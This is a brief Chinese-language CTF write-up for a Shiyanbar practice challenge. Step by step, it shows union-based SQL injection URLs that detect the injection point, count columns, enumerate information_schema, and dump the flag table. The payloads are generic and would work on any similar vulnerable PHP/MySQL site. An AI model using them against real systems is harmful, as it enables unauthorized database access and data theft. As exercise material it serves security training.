鏈接: http://ctf5.shiyanbar.com/8/index.php?id=1
方法:sql注入(php+MySQL)
1.首先判斷是否是注入點
http://ctf5.shiyanbar.com/8/index.php?id=1 and1=1
http://ctf5.shiyanbar.com/8/index.php?id=1 and1=2
發現頁面顯示不一樣,是注入點
2.猜解字段數
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3
發現2正常3不正常,字段數是2
3.爆破數據庫
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata
通過union select 1,database() 發現my_db是當前數據庫
4.爆破數據庫中的表
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,table_name from information_schema.tables where table_schema='my_db'
發現就是thiskey這個表
5.查看thiskey表中字段
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,column_name from information_schema.columns where table_schema='my_db'
發現存在一個k0y列
5.查看k0y列中的數據
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
有關information_schema數據庫中的信息參考http://help.wopus.org/mysql-manage/607.html